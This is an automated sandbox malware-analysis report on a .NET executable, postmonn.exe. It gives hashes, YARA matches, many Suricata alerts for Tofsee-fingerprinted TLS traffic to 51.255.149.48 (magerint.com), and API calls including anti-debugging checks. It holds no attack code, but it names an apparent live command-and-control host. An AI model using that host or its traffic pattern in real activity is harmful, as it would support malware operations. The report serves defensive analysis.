popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

postmonn.exe

Generic Malware Malicious Library Antivirus UPX Malicious Packer PE File OS Processor Check PE32 .NET EXE PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us June 29, 2023, 5:04 p.m. June 29, 2023, 5:07 p.m.
Size 380.0KB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 d699bb26d34ae6d55afdbf3cec0174e3
SHA256 4e13c9a092b38e7add44ab18fbebc0f6b891d08a4a5d8c17d1fd194e574769b8
CRC32 8F6B7EA3
ssdeep 6144:vmTWCHJmBPFWYHdbfjg2Xf9w+ScZWCzYjPvQK2DiA5ePE46guHrUECMCSgZRBWjq:vrzB8ob7gqf9FIx7Q3DluhVSYOta+pS
Yara
  • Is_DotNET_EXE - (no description)
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)

Name Response Post-Analysis Lookup
magerint.com
A 51.255.149.48
51.255.149.48
IP Address Status Action
164.124.101.2 Active Moloch
51.255.149.48 Active Moloch
62.217.160.2 Active Moloch
77.88.55.88 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49182 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49182 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49182 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49188 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49176 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49176 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49188 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49182 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49168 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49188 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 51.255.149.48:443 -> 192.168.56.103:49182 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49168 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49190 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49168 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49190 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49173 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49190 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49173 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49188 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49173 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49193 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49193 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49176 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49188 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49168 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49193 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 51.255.149.48:443 -> 192.168.56.103:49168 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49176 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49173 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49173 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49193 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49193 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49200 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49185 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49190 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49200 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49185 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49185 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49196 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49196 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49202 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49200 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49202 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49200 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49196 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49202 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 51.255.149.48:443 -> 192.168.56.103:49185 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49191 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49196 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49185 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49191 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49202 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49212 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49191 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49202 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49212 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49198 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49191 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49198 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49198 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49199 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49190 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49199 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49212 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49199 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 51.255.149.48:443 -> 192.168.56.103:49212 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49207 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49207 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49195 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49207 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49195 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49195 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 51.255.149.48:443 -> 192.168.56.103:49199 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49203 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49216 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49199 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49216 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49207 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49207 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49195 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49195 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49203 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49203 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 51.255.149.48:443 -> 192.168.56.103:49216 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49206 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49206 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49216 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49211 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49206 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49211 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49211 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49210 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 51.255.149.48:443 -> 192.168.56.103:49206 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49224 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49206 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49224 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49211 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49211 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49237 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49237 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49224 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49237 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 51.255.149.48:443 -> 192.168.56.103:49224 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49219 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49208 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49219 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49208 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49219 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49214 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49214 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49234 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49214 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 51.255.149.48:443 -> 192.168.56.103:49208 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49234 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49208 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49219 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49219 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49242 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49242 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49214 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49234 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49214 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49198 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49234 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49198 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49227 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49238 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49227 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49238 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49227 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49218 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49236 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49204 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49218 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49236 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49204 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49218 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49236 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 51.255.149.48:443 -> 192.168.56.103:49227 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49227 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49241 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49241 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49218 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49204 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49241 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 51.255.149.48:443 -> 192.168.56.103:49218 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49204 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49240 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49229 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49240 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49229 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49240 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49229 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49215 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49220 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49215 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49220 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49215 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 51.255.149.48:443 -> 192.168.56.103:49240 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49229 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49240 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49229 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49220 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49220 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49215 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49215 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49244 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49244 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49244 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49222 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49222 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49226 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49222 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 51.255.149.48:443 -> 192.168.56.103:49244 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49244 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49222 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49222 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49231 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49231 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49246 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49231 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49246 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49223 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49223 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49223 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 51.255.149.48:443 -> 192.168.56.103:49246 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49231 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49246 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49231 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49223 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49223 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49233 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49233 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49233 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49228 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49228 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49233 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49233 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49228 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49228 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49232 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49232 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49232 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 51.255.149.48:443 -> 192.168.56.103:49232 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49232 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49245 -> 51.255.149.48:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49245 -> 51.255.149.48:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49245 -> 51.255.149.48:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 51.255.149.48:443 -> 192.168.56.103:49238 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49238 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49226 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49226 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49203 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49203 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49242 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49242 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49186 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49186 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49210 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49245 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49210 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49245 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49236 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49236 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49237 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49237 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49241 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 51.255.149.48:443 -> 192.168.56.103:49241 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleA

 buffer: This program was made with an Unlicensed compiler.
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Please buy the PRO version to distribute your EXE.
console_handle: 0x00000007
1 1 0

WriteConsoleW

